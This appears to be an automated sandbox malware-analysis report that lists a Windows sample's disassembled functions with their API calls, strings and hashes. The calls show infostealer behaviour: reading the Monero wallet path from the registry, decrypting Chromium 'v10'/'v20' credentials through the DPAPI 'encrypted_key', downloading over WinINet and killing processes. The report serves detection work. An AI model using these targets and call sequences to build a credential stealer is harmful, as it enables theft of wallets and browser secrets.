                                • Opcode Fuzzy Hash: a97072621eaa64871e5987fcdc0cc44aec91f1edfe8579c2b7ac2eb8fcaddb4f
                                • Instruction Fuzzy Hash: AE315C72A00209BFDB20DBE5DC89FDEB778EF49700F104055FA05A7180EB70AB458BA5
                                Function 00C71120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C71135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C7113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00C71159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00C71173
                                • RegCloseKey.ADVAPI32(?), ref: 00C7117D
                                Strings
                                • wallet_path, xrefs: 00C7116D
                                • SOFTWARE\monero-project\monero-core, xrefs: 00C7114F
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 1509e9936ed35f75da24986b3fdee20562fe6092e7f2f4323887522e8b7ffbea
                                • Instruction ID: e6d53dc77e707a1863551f71d91968790169081d80bbd7ec7c5762abefdaa3b3
                                • Opcode Fuzzy Hash: 1509e9936ed35f75da24986b3fdee20562fe6092e7f2f4323887522e8b7ffbea
                                • Instruction Fuzzy Hash: 30F06D75A40219BFD7009BA69C8DEAB7B6CEB09755F004054BE05E6281E6B06A4887A0
                                Function 00C79DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00C79E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00C79E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00C79EA7
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • lstrcpy.KERNEL32(00000000,00CA4C48), ref: 00C79FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: a3cedefa516e849dca4227e4e2a8cbbcc820efdcd2157a2327195e4e7b8e311c
                                • Instruction ID: 181f96ba54e46a83cc027ec295a35f0cc7fc021baf6065041f99099da4d3e539
                                • Opcode Fuzzy Hash: a3cedefa516e849dca4227e4e2a8cbbcc820efdcd2157a2327195e4e7b8e311c
                                • Instruction Fuzzy Hash: 1351B071A102099BCB10EFA9DC85B9E77B8EF95328F158034F91DEB241DB70EE059B90
                                Function 00C75640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C7565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C75661
                                • InternetOpenA.WININET(00C9CFEC,00000000,00000000,00000000,00000000), ref: 00C75677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00C75692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00C756BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 00C756E1
                                • InternetCloseHandle.WININET(?), ref: 00C756FA
                                • InternetCloseHandle.WININET(00000000), ref: 00C75701
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: cc15624f5a05dd3987b8f9734ee6b51b57cb07ade86330c898825a5d70f72460
                                • Instruction ID: 69e5dad1dd27bd7fcd0e5a140ef65998bee551a03ec49514aa6b2a89b380fc18
                                • Opcode Fuzzy Hash: cc15624f5a05dd3987b8f9734ee6b51b57cb07ade86330c898825a5d70f72460
                                • Instruction Fuzzy Hash: A2419174A00605EFDB14CF65DD88F9AB7B4FF48300F14C069E918AB291D7B1AD45CB90
                                Function 00C94740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00C94759
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C94769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C9477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C947AB
                                • CloseHandle.KERNEL32(00000000), ref: 00C947B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C947C0
                                • CloseHandle.KERNEL32(00000000), ref: 00C947CB
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 92265d8e5ce39c8222fe79c6611a209538cb784a154538f19093e02c5ace0213
                                • Instruction ID: 086740ddd694ab88ea872dfa7de919b02eaaad6f540401b21a3f66890442ba67
                                • Opcode Fuzzy Hash: 92265d8e5ce39c8222fe79c6611a209538cb784a154538f19093e02c5ace0213
                                • Instruction Fuzzy Hash: 5F01967160121D6FEB205B619CCDFEA777CEB0E752F000190F905A5181DF70AE95CA60
                                Function 00C883E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C88435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8846C
                                • lstrlen.KERNEL32(00000000), ref: 00C884B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C884E9
                                • lstrlen.KERNEL32(00000000), ref: 00C884FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8852E
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C8853E
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: b463e047efb7716627f6106e872d23ac115d8bfe57cce5ae8e496d0451d59adf
                                • Instruction ID: 2639c175fb543b67c8dfad07909b377f9cc53bb3983e1a626e3a98a58188b4ff
                                • Opcode Fuzzy Hash: b463e047efb7716627f6106e872d23ac115d8bfe57cce5ae8e496d0451d59adf
                                • Instruction Fuzzy Hash: C751F5755002028FDB24EF29D884A5BB7F9EF88304F148419EC56EB609EF30EE49CB50
                                Function 00C92910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00C92925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9292C
                                • RegOpenKeyExA.ADVAPI32(80000002,0178BB40,00000000,00020119,00C928A9), ref: 00C9294B
                                • RegQueryValueExA.ADVAPI32(00C928A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00C92965
                                • RegCloseKey.ADVAPI32(00C928A9), ref: 00C9296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: e990607b0189c84c3996cfcfd9f18a29cd7cd519352f55375f340b53087c6df6
                                • Instruction ID: 3d894b16fa859963215f0b968f17c14a3a751ff0e2a42d058ffd335ec2f28653
                                • Opcode Fuzzy Hash: e990607b0189c84c3996cfcfd9f18a29cd7cd519352f55375f340b53087c6df6
                                • Instruction Fuzzy Hash: B5012878600319BFD710CBA1DC58EFB7BBCEB09745F104054FE85E7241E6306A088790
                                Function 00C92880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00C92895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C9289C
                                  • Part of subcall function 00C92910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00C92925
                                  • Part of subcall function 00C92910: RtlAllocateHeap.NTDLL(00000000), ref: 00C9292C
                                  • Part of subcall function 00C92910: RegOpenKeyExA.ADVAPI32(80000002,0178BB40,00000000,00020119,00C928A9), ref: 00C9294B
                                  • Part of subcall function 00C92910: RegQueryValueExA.ADVAPI32(00C928A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00C92965
                                  • Part of subcall function 00C92910: RegCloseKey.ADVAPI32(00C928A9), ref: 00C9296F
                                • RegOpenKeyExA.ADVAPI32(80000002,0178BB40,00000000,00020119,00C89500), ref: 00C928D1
                                • RegQueryValueExA.ADVAPI32(00C89500,0179EAF8,00000000,00000000,00000000,000000FF), ref: 00C928EC
                                • RegCloseKey.ADVAPI32(00C89500), ref: 00C928F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 36c2170977a8fcfc9ec4a9d018bdb58e4cc2c8b6eab8ded3c01ceef6b762629a
                                • Instruction ID: df6095ee3e6ee14f012d0b75d81941d2651efcc97e5f9e164135c28fdc341c78
                                • Opcode Fuzzy Hash: 36c2170977a8fcfc9ec4a9d018bdb58e4cc2c8b6eab8ded3c01ceef6b762629a
                                • Instruction Fuzzy Hash: B801A2B5A00209BFDB10DBA5AD4DEAB776CEB49315F004154FE08E6291DA706A4887A0
                                Function 00C771F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 00C7723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00C77279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C77280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C772C3
                                • HeapFree.KERNEL32(00000000), ref: 00C772CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00C77329
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 9eb866a4678d9db4c34b5fa3558de2ab89ca36631ee4cb256e960e78d1fb003d
                                • Instruction ID: 3273c86091d04ab484f58016f45560a78ad5d0d6357ab99d45b87e8f787b7a80
                                • Opcode Fuzzy Hash: 9eb866a4678d9db4c34b5fa3558de2ab89ca36631ee4cb256e960e78d1fb003d
                                • Instruction Fuzzy Hash: 2F416C7170570ADBDB20CF6ADC84BAAB3E8EB89305F148669EC6DC7311E631E9109B50
                                Function 00C79C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00C79CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C79CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C79D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 06440b906926b52d36d0d1b4e6416ef6ddc2d9627bad22e44c4c8d45f2eb738e
                                • Instruction ID: 4a6044e7f143784736b15df99e2767fec988de46cfcb7040afbc1943b5273835
                                • Opcode Fuzzy Hash: 06440b906926b52d36d0d1b4e6416ef6ddc2d9627bad22e44c4c8d45f2eb738e
                                • Instruction Fuzzy Hash: 6E41AF71A002099FCF21EF65DC45AAEB7B4EFA4314F04C564E929AB252DA30EE05D780
                                Function 00C8E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8EA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EA53
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8EA61
